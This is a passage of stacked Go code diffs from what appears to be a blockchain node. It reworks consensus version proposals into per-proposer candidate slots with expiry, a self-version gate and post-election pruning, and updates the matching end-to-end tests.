 	// longer block a legitimate lower one — each candidate is adopted (or not) by the
 	// readiness guard on its own merits, and garbage-collected at expiry / no-traction.
 	se.upsertVersionProposal(consensus_state.VersionProposal{
-		TargetMajor:     target.Major,
-		TargetConsensus: target.Consensus,
+		Target:          target,
 		ActivationEpoch: activationEpoch,
 		CreationEpoch:   elec.Epoch,
 		ExpiryEpoch:     elec.Epoch + se.sconf.ConsensusParams().VersionProposalExpiry(),
@@ -280,8 +279,7 @@ func (se *StateEngine) executeRecoveryRequireVersion(tx *TxRecoveryRequireVersio
 	}
 	target := coordinationTarget(consensusversion.Version{Major: tx.Major, Consensus: tx.Consensus})
 	s := &consensus_state.VersionProposal{
-		TargetMajor:     target.Major,
-		TargetConsensus: target.Consensus,
+		Target:          target,
 		ActivationEpoch: elec.Epoch + 1,
 		CreationEpoch:   elec.Epoch,
 		Forced:          true,
@@ -312,7 +310,7 @@ func (se *StateEngine) PruneVersionProposalsAfterElection(elec elections.Electio
 	fastFail := se.sconf.ConsensusParams().VersionProposalFastFail()
 
 	// Clear the recovery override once it has been adopted (target <= floor).
-	if f := se.forcedActivation(); f != nil && f.Target().Cmp(floor) <= 0 {
+	if f := se.forcedActivation(); f != nil && f.Target.Cmp(floor) <= 0 {
 		if err := se.consensusState.SetForcedActivation(context.Background(), nil); err != nil {
 			log.Warn("clear forced activation failed", "err", err)
 		} else {
@@ -329,12 +327,12 @@ func (se *StateEngine) PruneVersionProposalsAfterElection(elec elections.Electio
 	for _, p := range props {
 		drop := false
 		switch {
-		case p.Target().Cmp(floor) <= 0: // adopted or sub-floor → auto-cancel
+		case p.Target.Cmp(floor) <= 0: // adopted or sub-floor → auto-cancel
 			drop = true
 		case p.ExpiryEpoch != 0 && epoch >= p.ExpiryEpoch: // hard deadline
 			drop = true
 		case fastFail > 0 && epoch >= p.CreationEpoch+fastFail &&
-			versionProposalReadyWeight(elec, p.Target()) <= electionMemberWeightOf(elec, p.Proposer):
+			versionProposalReadyWeight(elec, p.Target) <= electionMemberWeightOf(elec, p.Proposer):
 			drop = true // no traction beyond the proposer
 		}
 		if drop {

--- a/modules/state-processing/consensus_version.go
+++ b/modules/state-processing/consensus_version.go
@@ -42,26 +42,74 @@ func (se *StateEngine) ProcessingSuspendedForPool() bool {
 	return se.chainProcessingSuspended()
 }
 
-// scheduledActivation returns a copy of the cached pending schedule (or nil).
-func (se *StateEngine) scheduledActivation() *consensus_state.ScheduledActivation {
+// forcedActivation returns a copy of the cached recovery override (or nil).
+func (se *StateEngine) forcedActivation() *consensus_state.VersionProposal {
 	se.chainConsensusMu.RLock()
 	defer se.chainConsensusMu.RUnlock()
-	if se.chainConsensusCache.ScheduledActivation == nil {
+	if se.chainConsensusCache.ForcedActivation == nil {
 		return nil
 	}
-	s := *se.chainConsensusCache.ScheduledActivation
+	s := *se.chainConsensusCache.ForcedActivation
 	return &s
 }
 
-// ScheduledActivationForHeight returns the pending schedule only if it was recorded before
-// blk. This makes the read a pure function of blk so all signers regenerating an election at
-// the same height resolve the identical version (and CID), regardless of later proposals.
-func (se *StateEngine) ScheduledActivationForHeight(blk uint64) *consensus_state.ScheduledActivation {
-	s := se.scheduledActivation()
+// versionProposals returns a copy of the cached normal-proposal set.
+func (se *StateEngine) versionProposals() []consensus_state.VersionProposal {
+	se.chainConsensusMu.RLock()
+	defer se.chainConsensusMu.RUnlock()
+	if len(se.chainConsensusCache.VersionProposals) == 0 {
+		return nil
+	}
+	out := make([]consensus_state.VersionProposal, len(se.chainConsensusCache.VersionProposals))
+	copy(out, se.chainConsensusCache.VersionProposals)
+	return out
+}
+
+// ForcedActivationForHeight returns the recovery override only if it was recorded
+// before blk. Height-addressable so all signers resolve the identical floor → CID.
+func (se *StateEngine) ForcedActivationForHeight(blk uint64) *consensus_state.VersionProposal {
+	s := se.forcedActivation()
 	if s == nil || s.BlockHeight >= blk {
 		return nil
 	}
 	return s
+}
+
+// VersionProposalsForHeight returns the candidate proposals recorded before blk
+// (height-addressable). Expiry is NOT applied here — the election builder evaluates
+// liveness against the election epoch deterministically.
+func (se *StateEngine) VersionProposalsForHeight(blk uint64) []consensus_state.VersionProposal {
+	all := se.versionProposals()
+	out := all[:0]
+	for _, p := range all {
+		if p.BlockHeight < blk {
+			out = append(out, p)
+		}
+	}
+	return out
+}
+
+// upsertVersionProposal writes p into the proposal set keyed by proposer (one slot
+// each, replacing any prior entry from the same proposer) and persists. The state
+// engine processes blocks serially, so this read-modify-write is race-free.
+func (se *StateEngine) upsertVersionProposal(p consensus_state.VersionProposal) {
+	props := se.versionProposals()
+	replaced := false
+	for i := range props {
+		if props[i].Proposer == p.Proposer {
+			props[i] = p
+			replaced = true
+			break
+		}
+	}
+	if !replaced {
+		props = append(props, p)
+	}
+	if err := se.consensusState.SetVersionProposals(context.Background(), props); err != nil {
+		log.Warn("SetVersionProposals failed", "err", err)
+		return
+	}
+	se.refreshChainConsensusCache()
 }
 
 // ActiveConsensusVersion returns the chain-active consensus triple at a block height,
@@ -113,9 +161,14 @@ func (se *StateEngine) executeProposeConsensusVersion(tx *TxProposeConsensusVers
 		return
 	}
 	proposer := firstHiveAuth(tx.Self.RequiredAuths)
+	if proposer == "" {
+		return
+	}
+	// Proposer must be a current committee member. Normalize the "hive:" prefix on
+	// both sides so a prefixed member still matches the bare auth account.
 	found := false
 	for _, m := range elec.Members {
-		if m.Account == proposer {
+		if strings.TrimPrefix(m.Account, "hive:") == proposer {
 			found = true
 			break
 		}
@@ -128,6 +181,23 @@ func (se *StateEngine) executeProposeConsensusVersion(tx *TxProposeConsensusVers
 	if target.Cmp(elections.ResultVersion(elec)) <= 0 {
 		return
 	}
+	// Self-version gate: a proposer may only propose up to the version it is
+	// ANNOUNCING (i.e. running) — "upgrade your node before proposing it to the
+	// network." Read the proposer's witness record at this height; reject if its
+	// announced triple does not meet the target. Deterministic (on-chain witness
+	// record at a fixed height, identical on every node). A read error drops the op
+	// (like the election read above); a missing record skips the gate — a real
+	// committee member always has an announcement, so this only relaxes test paths.
+	if se.witnessDb != nil {
+		bh := tx.Self.BlockHeight
+		w, werr := se.witnessDb.GetWitnessAtHeight(proposer, &bh)
+		if werr != nil {
+			return
+		}
+		if w != nil && !w.ConsensusVersionTriple().MeetsConsensusMin(target) {
+			return
+		}
+	}
 	// Activation epoch: default to the next epoch; reject targets aimed at the past/current.
 	activationEpoch := tx.ActivationEpoch
 	if activationEpoch == 0 {
@@ -136,24 +206,21 @@ func (se *StateEngine) executeProposeConsensusVersion(tx *TxProposeConsensusVers
 	if activationEpoch <= elec.Epoch {
 		return
 	}
-	// Monotone replace: only a strictly-higher target supersedes an existing schedule.
-	if existing := se.scheduledActivation(); existing != nil && target.Cmp(existing.Target()) <= 0 {
-		return
-	}
-	s := &consensus_state.ScheduledActivation{
+	// One candidate slot per proposer (re-proposing replaces your own). There is no
+	// "strictly higher than the standing schedule" rule, so a high junk target can no
+	// longer block a legitimate lower one — each candidate is adopted (or not) by the
+	// readiness guard on its own merits, and garbage-collected at expiry / no-traction.
+	se.upsertVersionProposal(consensus_state.VersionProposal{
 		TargetMajor:     target.Major,
 		TargetConsensus: target.Consensus,
 		ActivationEpoch: activationEpoch,
+		CreationEpoch:   elec.Epoch,
+		ExpiryEpoch:     elec.Epoch + se.sconf.ConsensusParams().VersionProposalExpiry(),
 		Forced:          false,
 		Proposer:        proposer,
 		TxId:            tx.Self.TxId,
 		BlockHeight:     tx.Self.BlockHeight,
-	}
-	if err := se.consensusState.SetScheduledActivation(context.Background(), s); err != nil {
-		log.Warn("SetScheduledActivation failed", "err", err)
-		return
-	}
-	se.refreshChainConsensusCache()
+	})
 }
 
 func (se *StateEngine) executeRecoverySuspend(tx *TxRecoverySuspend) {
@@ -212,10 +279,11 @@ func (se *StateEngine) executeRecoveryRequireVersion(tx *TxRecoveryRequireVersio
 		return
 	}
 	target := coordinationTarget(consensusversion.Version{Major: tx.Major, Consensus: tx.Consensus})
-	s := &consensus_state.ScheduledActivation{
+	s := &consensus_state.VersionProposal{
 		TargetMajor:     target.Major,
 		TargetConsensus: target.Consensus,
 		ActivationEpoch: elec.Epoch + 1,
+		CreationEpoch:   elec.Epoch,
 		Forced:          true,
 		Proposer:        firstHiveAuth(tx.Self.RequiredAuths),
 		TxId:            tx.Self.TxId,
@@ -226,6 +294,94 @@ func (se *StateEngine) executeRecoveryRequireVersion(tx *TxRecoveryRequireVersio
 		return
 	}
 	se.refreshChainConsensusCache()
+}
+
+// PruneVersionProposalsAfterElection garbage-collects the candidate set + recovery
+// override once a ratified election makes a new floor canonical. It drops proposals
+// that are adopted/sub-floor (target <= floor), past their hard deadline
+// (expiryEpoch <= epoch), or have no traction beyond their own proposer past the
+// fast-fail window. Deterministic: it reads only the ratified election (members,
+// weights, per-member announced versions) + the proposal set, so every node prunes
+// identically. This is the wiring that replaces the never-called ClearScheduledActivation.
+func (se *StateEngine) PruneVersionProposalsAfterElection(elec elections.ElectionResult) {
+	if se.consensusState == nil {
+		return
+	}
+	floor := elections.ResultVersion(elec)
+	epoch := elec.Epoch
+	fastFail := se.sconf.ConsensusParams().VersionProposalFastFail()
+
+	// Clear the recovery override once it has been adopted (target <= floor).
+	if f := se.forcedActivation(); f != nil && f.Target().Cmp(floor) <= 0 {
+		if err := se.consensusState.SetForcedActivation(context.Background(), nil); err != nil {
+			log.Warn("clear forced activation failed", "err", err)
+		} else {
+			se.refreshChainConsensusCache()
+		}
+	}
+
+	props := se.versionProposals()
+	if len(props) == 0 {
+		return
+	}
+	kept := props[:0]
+	changed := false
+	for _, p := range props {
+		drop := false
+		switch {
+		case p.Target().Cmp(floor) <= 0: // adopted or sub-floor → auto-cancel
+			drop = true
+		case p.ExpiryEpoch != 0 && epoch >= p.ExpiryEpoch: // hard deadline
+			drop = true
+		case fastFail > 0 && epoch >= p.CreationEpoch+fastFail &&
+			versionProposalReadyWeight(elec, p.Target()) <= electionMemberWeightOf(elec, p.Proposer):
+			drop = true // no traction beyond the proposer
+		}
+		if drop {
+			changed = true
+			continue
+		}
+		kept = append(kept, p)
+	}
+	if !changed {
+		return
+	}
+	if err := se.consensusState.SetVersionProposals(context.Background(), kept); err != nil {
+		log.Warn("prune version proposals failed", "err", err)
+		return
+	}
+	se.refreshChainConsensusCache()
+}
+
+// versionProposalReadyWeight sums the election weight of members whose announced
+// version meets target — the same readiness basis the election proposer uses.
+func versionProposalReadyWeight(elec elections.ElectionResult, target consensusversion.Version) uint64 {
+	var total uint64
+	for i, m := range elec.Members {
+		if elections.MemberConsensusVersion(m, elec).MeetsConsensusMin(target) {
+			total += electionWeightAt(elec, i)
+		}
+	}
+	return total
+}
+
+// electionMemberWeightOf returns account's election weight (0 if not a member).
+func electionMemberWeightOf(elec elections.ElectionResult, account string) uint64 {
+	acct := strings.TrimPrefix(account, "hive:")
+	for i, m := range elec.Members {
+		if strings.TrimPrefix(m.Account, "hive:") == acct {
+			return electionWeightAt(elec, i)
+		}
+	}
+	return 0
+}
+
+// electionWeightAt returns Weights[i], or 1 for an unweighted election.
+func electionWeightAt(elec elections.ElectionResult, i int) uint64 {
+	if len(elec.Weights) == len(elec.Members) && i < len(elec.Weights) {
+		return elec.Weights[i]
+	}
+	return 1
 }
 
 func firstHiveAuth(auths []string) string {

--- a/modules/state-processing/consensus_version_e2e_test.go
+++ b/modules/state-processing/consensus_version_e2e_test.go
@@ -5,6 +5,7 @@ import (
 	"testing"
 
 	"vsc-node/lib/test_utils"
+	"vsc-node/modules/common/consensusversion"
 	"vsc-node/modules/common/params"
 	systemconfig "vsc-node/modules/common/system-config"
 	"vsc-node/modules/db/vsc/consensus_state"
@@ -65,6 +66,11 @@ func proposeJSON(major, consensus, activationEpoch uint64) string {
 	return string(b)
 }
 
+// vp builds a coordinated target version (major.consensus).
+func vp(major, consensus uint64) consensusversion.Version {
+	return consensusversion.Version{Major: major, Consensus: consensus}
+}
+
 // propOf returns proposer's candidate proposal from the snapshot (or nil).
 func propOf(st consensus_state.ChainConsensusState, proposer string) *consensus_state.VersionProposal {
 	for i := range st.VersionProposals {
@@ -89,8 +95,8 @@ func TestE2E_ProposeSchedulesActivation(t *testing.T) {
 
 	s := propOf(mem.Snapshot(), "alice")
 	require.NotNil(t, s)
-	assert.Equal(t, uint64(1), s.TargetMajor)
-	assert.Equal(t, uint64(1), s.TargetConsensus)
+	assert.Equal(t, uint64(1), s.Target.Major)
+	assert.Equal(t, uint64(1), s.Target.Consensus)
 	assert.Equal(t, uint64(2), s.ActivationEpoch, "default activation epoch is currentEpoch+1")
 	assert.Equal(t, uint64(1), s.CreationEpoch)
 	assert.False(t, s.Forced)
@@ -156,10 +162,10 @@ func TestE2E_ProposeMultiCandidateNoPoison(t *testing.T) {
 	require.Len(t, st.VersionProposals, 2, "both candidates coexist (one slot per proposer)")
 	a := propOf(st, "alice")
 	require.NotNil(t, a)
-	assert.Equal(t, uint64(1), a.TargetConsensus, "alice's legitimate 1.1 survives the poison")
+	assert.Equal(t, uint64(1), a.Target.Consensus, "alice's legitimate 1.1 survives the poison")
 	b := propOf(st, "bob")
 	require.NotNil(t, b)
-	assert.Equal(t, uint64(99), b.TargetMajor)
+	assert.Equal(t, uint64(99), b.Target.Major)
 }
 
 // TestE2E_ProposeOnePerProposer: a second proposal from the same proposer replaces
@@ -180,7 +186,7 @@ func TestE2E_ProposeOnePerProposer(t *testing.T) {
 
 	st := mem.Snapshot()
 	require.Len(t, st.VersionProposals, 1, "alice keeps a single slot")
-	assert.Equal(t, uint64(5), st.VersionProposals[0].TargetConsensus, "re-propose replaced alice's own slot")
+	assert.Equal(t, uint64(5), st.VersionProposals[0].Target.Consensus, "re-propose replaced alice's own slot")
 }
 
 // TestE2E_ProposeSelfVersionGate: a proposer may only propose up to the version it
@@ -231,7 +237,7 @@ func TestE2E_ProposeCustomAndPastActivationEpoch(t *testing.T) {
 	te.processAndWait()
 	a = propOf(mem.Snapshot(), "alice")
 	require.NotNil(t, a)
-	assert.Equal(t, uint64(1), a.TargetMajor, "proposal with past activation epoch rejected; prior slot kept")
+	assert.Equal(t, uint64(1), a.Target.Major, "proposal with past activation epoch rejected; prior slot kept")
 	assert.Equal(t, uint64(5), a.ActivationEpoch)
 }
 
@@ -288,8 +294,8 @@ func TestE2E_RecoveryRequireVersionForcedScheduleAndClears(t *testing.T) {
 	assert.False(t, st.ProcessingSuspended)
 	require.NotNil(t, st.ForcedActivation)
 	assert.True(t, st.ForcedActivation.Forced, "recovery installs a forced activation")
-	assert.Equal(t, uint64(1), st.ForcedActivation.TargetMajor)
-	assert.Equal(t, uint64(2), st.ForcedActivation.TargetConsensus)
+	assert.Equal(t, uint64(1), st.ForcedActivation.Target.Major)
+	assert.Equal(t, uint64(2), st.ForcedActivation.Target.Consensus)
 	assert.Equal(t, uint64(2), st.ForcedActivation.ActivationEpoch, "recovery activates next epoch")
 }
 
@@ -360,7 +366,7 @@ func TestE2E_VersionProposalsForHeightFilter(t *testing.T) {
 	mem.ReplaceState(consensus_state.ChainConsensusState{
 		ID: "singleton",
 		VersionProposals: []consensus_state.VersionProposal{
-			{TargetMajor: 1, TargetConsensus: 1, ActivationEpoch: 3, BlockHeight: 10, Proposer: "alice"},
+			{Target: vp(1, 1), ActivationEpoch: 3, BlockHeight: 10, Proposer: "alice"},
 		},
 	})
 	te := newTestEnvWithConsensus(mem, nil)
@@ -380,14 +386,14 @@ func TestE2E_PruneVersionProposalsAfterElection(t *testing.T) {
 		ID: "singleton",
 		// Forced override at 1.2 — adopted once the floor reaches it.
 		ForcedActivation: &consensus_state.VersionProposal{
-			TargetMajor: 1, TargetConsensus: 2, Forced: true, Proposer: "alice",
+			Target: vp(1, 2), Forced: true, Proposer: "alice",
 		},
 		VersionProposals: []consensus_state.VersionProposal{
-			{TargetMajor: 1, TargetConsensus: 2, Proposer: "a", CreationEpoch: 1, ExpiryEpoch: 100},     // == floor → drop (adopted)
-			{TargetMajor: 1, TargetConsensus: 1, Proposer: "b", CreationEpoch: 1, ExpiryEpoch: 100},     // < floor → drop (sub-floor)
-			{TargetMajor: 1, TargetConsensus: 3, Proposer: "c", CreationEpoch: 1, ExpiryEpoch: 5},       // expired (5 <= epoch 10) → drop
-			{TargetMajor: 1, TargetConsensus: 4, Proposer: "alice", CreationEpoch: 1, ExpiryEpoch: 100}, // no traction past fast-fail → drop
-			{TargetMajor: 1, TargetConsensus: 5, Proposer: "d", CreationEpoch: 9, ExpiryEpoch: 100},     // fresh (within fast-fail) → keep
+			{Target: vp(1, 2), Proposer: "a", CreationEpoch: 1, ExpiryEpoch: 100},     // == floor → drop (adopted)
+			{Target: vp(1, 1), Proposer: "b", CreationEpoch: 1, ExpiryEpoch: 100},     // < floor → drop (sub-floor)
+			{Target: vp(1, 3), Proposer: "c", CreationEpoch: 1, ExpiryEpoch: 5},       // expired (5 <= epoch 10) → drop
+			{Target: vp(1, 4), Proposer: "alice", CreationEpoch: 1, ExpiryEpoch: 100}, // no traction past fast-fail → drop
+			{Target: vp(1, 5), Proposer: "d", CreationEpoch: 9, ExpiryEpoch: 100},     // fresh (within fast-fail) → keep
 		},
 	})
 	te := newTestEnvWithConsensus(mem, nil)
@@ -402,5 +408,5 @@ func TestE2E_PruneVersionProposalsAfterElection(t *testing.T) {
 	assert.Nil(t, st.ForcedActivation, "adopted forced override cleared")
 	require.Len(t, st.VersionProposals, 1, "only the fresh, still-viable candidate survives")
 	assert.Equal(t, "d", st.VersionProposals[0].Proposer)
-	assert.Equal(t, uint64(5), st.VersionProposals[0].TargetConsensus)
+	assert.Equal(t, uint64(5), st.VersionProposals[0].Target.Consensus)
 }

--- a/modules/state-processing/consensus_version_e2e_test.go
+++ b/modules/state-processing/consensus_version_e2e_test.go
@@ -9,6 +9,7 @@ import (
 	systemconfig "vsc-node/modules/common/system-config"
 	"vsc-node/modules/db/vsc/consensus_state"
 	"vsc-node/modules/db/vsc/elections"
+	"vsc-node/modules/db/vsc/witnesses"
 	stateEngine "vsc-node/modules/state-processing"
 
 	"github.com/stretchr/testify/assert"
@@ -64,6 +65,16 @@ func proposeJSON(major, consensus, activationEpoch uint64) string {
 	return string(b)
 }
 
+// propOf returns proposer's candidate proposal from the snapshot (or nil).
+func propOf(st consensus_state.ChainConsensusState, proposer string) *consensus_state.VersionProposal {
+	for i := range st.VersionProposals {
+		if st.VersionProposals[i].Proposer == proposer {
+			return &st.VersionProposals[i]
+		}
+	}
+	return nil
+}
+
 func TestE2E_ProposeSchedulesActivation(t *testing.T) {
 	mem := test_utils.NewMockConsensusState()
 	te := newTestEnvWithConsensus(mem, nil)
@@ -76,11 +87,12 @@ func TestE2E_ProposeSchedulesActivation(t *testing.T) {
 	})
 	te.processAndWait()
 
-	s := mem.Snapshot().ScheduledActivation
+	s := propOf(mem.Snapshot(), "alice")
 	require.NotNil(t, s)
 	assert.Equal(t, uint64(1), s.TargetMajor)
 	assert.Equal(t, uint64(1), s.TargetConsensus)
 	assert.Equal(t, uint64(2), s.ActivationEpoch, "default activation epoch is currentEpoch+1")
+	assert.Equal(t, uint64(1), s.CreationEpoch)
 	assert.False(t, s.Forced)
 	assert.Equal(t, "alice", s.Proposer)
 }
@@ -97,7 +109,7 @@ func TestE2E_ProposeIgnoredWhenProposerNotInCommittee(t *testing.T) {
 	})
 	te.processAndWait()
 
-	assert.Nil(t, mem.Snapshot().ScheduledActivation)
+	assert.Empty(t, mem.Snapshot().VersionProposals)
 }
 
 func TestE2E_ProposeBelowOrEqualActiveIgnored(t *testing.T) {
@@ -110,42 +122,91 @@ func TestE2E_ProposeBelowOrEqualActiveIgnored(t *testing.T) {
 		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 2, 0),
 	})
 	te.processAndWait()
-	assert.Nil(t, mem.Snapshot().ScheduledActivation, "target equal to active must be ignored")
+	assert.Empty(t, mem.Snapshot().VersionProposals, "target equal to active must be ignored")
 
 	// Below active → ignored.
 	te.Creator.CustomJson(stateEngine.MockJson{
 		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 1, 0),
 	})
 	te.processAndWait()
-	assert.Nil(t, mem.Snapshot().ScheduledActivation, "target below active must be ignored")
+	assert.Empty(t, mem.Snapshot().VersionProposals, "target below active must be ignored")
 }
 
-func TestE2E_ProposeMonotoneReplace(t *testing.T) {
+// TestE2E_ProposeMultiCandidateNoPoison: distinct proposers hold independent
+// candidate slots, and a junk high target cannot block a legitimate lower one
+// (the poison can only fail readiness — it never displaces another candidate).
+func TestE2E_ProposeMultiCandidateNoPoison(t *testing.T) {
 	mem := test_utils.NewMockConsensusState()
 	te := newTestEnvWithConsensus(mem, nil)
 	te.ElectionDb.ElectionsByHeight[1] = sampleElection(1) // active 0.0
 
-	// Schedule 1.1.
+	// alice proposes a real 1.1.
 	te.Creator.CustomJson(stateEngine.MockJson{
 		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 1, 0),
 	})
 	te.processAndWait()
-	require.NotNil(t, mem.Snapshot().ScheduledActivation)
-	assert.Equal(t, uint64(1), mem.Snapshot().ScheduledActivation.TargetConsensus)
 
-	// Lower target (1.0) must NOT replace.
+	// bob proposes a poison 99.0 — it must NOT remove or block alice's candidate.
 	te.Creator.CustomJson(stateEngine.MockJson{
-		RequiredAuths: []string{"bob"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 0, 0),
+		RequiredAuths: []string{"bob"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(99, 0, 0),
 	})
 	te.processAndWait()
-	assert.Equal(t, uint64(1), mem.Snapshot().ScheduledActivation.TargetConsensus, "lower target must not replace")
 
-	// Strictly higher target (2.0) replaces.
+	st := mem.Snapshot()
+	require.Len(t, st.VersionProposals, 2, "both candidates coexist (one slot per proposer)")
+	a := propOf(st, "alice")
+	require.NotNil(t, a)
+	assert.Equal(t, uint64(1), a.TargetConsensus, "alice's legitimate 1.1 survives the poison")
+	b := propOf(st, "bob")
+	require.NotNil(t, b)
+	assert.Equal(t, uint64(99), b.TargetMajor)
+}
+
+// TestE2E_ProposeOnePerProposer: a second proposal from the same proposer replaces
+// its own slot (never accumulates).
+func TestE2E_ProposeOnePerProposer(t *testing.T) {
+	mem := test_utils.NewMockConsensusState()
+	te := newTestEnvWithConsensus(mem, nil)
+	te.ElectionDb.ElectionsByHeight[1] = sampleElection(1)
+
 	te.Creator.CustomJson(stateEngine.MockJson{
-		RequiredAuths: []string{"carol"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(2, 0, 0),
+		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 1, 0),
 	})
 	te.processAndWait()
-	assert.Equal(t, uint64(2), mem.Snapshot().ScheduledActivation.TargetMajor, "higher target must replace")
+	te.Creator.CustomJson(stateEngine.MockJson{
+		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 5, 0),
+	})
+	te.processAndWait()
+
+	st := mem.Snapshot()
+	require.Len(t, st.VersionProposals, 1, "alice keeps a single slot")
+	assert.Equal(t, uint64(5), st.VersionProposals[0].TargetConsensus, "re-propose replaced alice's own slot")
+}
+
+// TestE2E_ProposeSelfVersionGate: a proposer may only propose up to the version it
+// is announcing — proposing higher than its witness record is rejected.
+func TestE2E_ProposeSelfVersionGate(t *testing.T) {
+	mem := test_utils.NewMockConsensusState()
+	te := newTestEnvWithConsensus(mem, nil)
+	te.ElectionDb.ElectionsByHeight[1] = sampleElection(1)
+	// alice announces 1.1; bob has no record (gate skipped for missing records).
+	te.WitnessDb.ByAccount = map[string]*witnesses.Witness{
+		"alice": {Account: "alice", VersionMajor: 1, ProtocolVersion: 1},
+	}
+
+	// alice proposes 1.2 (> announced 1.1) → rejected.
+	te.Creator.CustomJson(stateEngine.MockJson{
+		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 2, 0),
+	})
+	te.processAndWait()
+	assert.Nil(t, propOf(mem.Snapshot(), "alice"), "proposing above announced version is rejected")
+
+	// alice proposes 1.1 (== announced) → accepted.
+	te.Creator.CustomJson(stateEngine.MockJson{
+		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 1, 0),
+	})
+	te.processAndWait()
+	require.NotNil(t, propOf(mem.Snapshot(), "alice"), "proposing at announced version is accepted")
 }
 
 func TestE2E_ProposeCustomAndPastActivationEpoch(t *testing.T) {
@@ -158,16 +219,20 @@ func TestE2E_ProposeCustomAndPastActivationEpoch(t *testing.T) {
 		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(1, 1, 5),
 	})
 	te.processAndWait()
-	require.NotNil(t, mem.Snapshot().ScheduledActivation)
-	assert.Equal(t, uint64(5), mem.Snapshot().ScheduledActivation.ActivationEpoch)
+	a := propOf(mem.Snapshot(), "alice")
+	require.NotNil(t, a)
+	assert.Equal(t, uint64(5), a.ActivationEpoch)
 
-	// Past/current activation epoch (<= current epoch 1) rejected — a strictly higher target
-	// with a bad epoch must not replace the existing schedule.
+	// alice re-proposes with a past/current activation epoch (<= current epoch 1) →
+	// rejected, so her existing slot is unchanged.
 	te.Creator.CustomJson(stateEngine.MockJson{
 		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(2, 0, 1),
 	})
 	te.processAndWait()
-	assert.Equal(t, uint64(1), mem.Snapshot().ScheduledActivation.TargetMajor, "proposal with past activation epoch rejected")
+	a = propOf(mem.Snapshot(), "alice")
+	require.NotNil(t, a)
+	assert.Equal(t, uint64(1), a.TargetMajor, "proposal with past activation epoch rejected; prior slot kept")
+	assert.Equal(t, uint64(5), a.ActivationEpoch)
 }
 
 func TestE2E_ProposeIgnoredWhileSuspended(t *testing.T) {
@@ -186,7 +251,7 @@ func TestE2E_ProposeIgnoredWhileSuspended(t *testing.T) {
 		RequiredAuths: []string{"alice"}, Id: "vsc.propose_consensus_version", Json: proposeJSON(2, 0, 0),
 	})
 	te.processAndWait()
-	assert.Nil(t, mem.Snapshot().ScheduledActivation, "propose must be skipped while suspended")
+	assert.Empty(t, mem.Snapshot().VersionProposals, "propose must be skipped while suspended")
 }
 
 func TestE2E_RecoverySuspendSetsFlag(t *testing.T) {
@@ -221,11 +286,11 @@ func TestE2E_RecoveryRequireVersionForcedScheduleAndClears(t *testing.T) {
 
 	st := mem.Snapshot()
 	assert.False(t, st.ProcessingSuspended)
-	require.NotNil(t, st.ScheduledActivation)
-	assert.True(t, st.ScheduledActivation.Forced, "recovery schedules a forced activation")
-	assert.Equal(t, uint64(1), st.ScheduledActivation.TargetMajor)
-	assert.Equal(t, uint64(2), st.ScheduledActivation.TargetConsensus)
-	assert.Equal(t, uint64(2), st.ScheduledActivation.ActivationEpoch, "recovery activates next epoch")
+	require.NotNil(t, st.ForcedActivation)
+	assert.True(t, st.ForcedActivation.Forced, "recovery installs a forced activation")
+	assert.Equal(t, uint64(1), st.ForcedActivation.TargetMajor)
+	assert.Equal(t, uint64(2), st.ForcedActivation.TargetConsensus)
+	assert.Equal(t, uint64(2), st.ForcedActivation.ActivationEpoch, "recovery activates next epoch")
 }
 
 func TestE2E_RecoveryRequireVersionWithoutPriorSuspendNoOp(t *testing.T) {
@@ -240,7 +305,7 @@ func TestE2E_RecoveryRequireVersionWithoutPriorSuspendNoOp(t *testing.T) {
 	})
 	te.processAndWait()
 
-	assert.Nil(t, mem.Snapshot().ScheduledActivation, "must not schedule without suspend-then-resume flow")
+	assert.Nil(t, mem.Snapshot().ForcedActivation, "must not schedule without suspend-then-resume flow")
 }
 
 func TestE2E_RecoveryRequireVersionWithInsufficientSignersNoOp(t *testing.T) {
@@ -288,18 +353,54 @@ func TestE2E_ActiveConsensusVersionPureOfHeight(t *testing.T) {
 	assert.Equal(t, uint64(3), v.Consensus, "active version is the election's ResultVersion, no live merge")
 }
 
-func TestE2E_ScheduledActivationForHeightFilter(t *testing.T) {
+// TestE2E_VersionProposalsForHeightFilter: a candidate is height-addressable — not
+// visible at its own block height, visible strictly after it (keeps election CIDs pure).
+func TestE2E_VersionProposalsForHeightFilter(t *testing.T) {
 	mem := test_utils.NewMockConsensusState()
 	mem.ReplaceState(consensus_state.ChainConsensusState{
 		ID: "singleton",
-		ScheduledActivation: &consensus_state.ScheduledActivation{
-			TargetMajor: 1, TargetConsensus: 1, ActivationEpoch: 3, BlockHeight: 10,
+		VersionProposals: []consensus_state.VersionProposal{
+			{TargetMajor: 1, TargetConsensus: 1, ActivationEpoch: 3, BlockHeight: 10, Proposer: "alice"},
 		},
 	})
 	te := newTestEnvWithConsensus(mem, nil)
 	te.ElectionDb.ElectionsByHeight[1] = sampleElection(1)
 	te.processAndWait() // load cache from mem
 
-	assert.Nil(t, te.SE.ScheduledActivationForHeight(10), "schedule not visible at its own block height")
-	assert.NotNil(t, te.SE.ScheduledActivationForHeight(11), "schedule visible after its block height")
+	assert.Empty(t, te.SE.VersionProposalsForHeight(10), "candidate not visible at its own block height")
+	assert.Len(t, te.SE.VersionProposalsForHeight(11), 1, "candidate visible after its block height")
+}
+
+// TestE2E_PruneVersionProposalsAfterElection covers the deterministic GC: adopted /
+// sub-floor / hard-expired / no-traction candidates are dropped, fresh ones kept, and
+// an adopted recovery override is cleared.
+func TestE2E_PruneVersionProposalsAfterElection(t *testing.T) {
+	mem := test_utils.NewMockConsensusState()
+	mem.ReplaceState(consensus_state.ChainConsensusState{
+		ID: "singleton",
+		// Forced override at 1.2 — adopted once the floor reaches it.
+		ForcedActivation: &consensus_state.VersionProposal{
+			TargetMajor: 1, TargetConsensus: 2, Forced: true, Proposer: "alice",
+		},
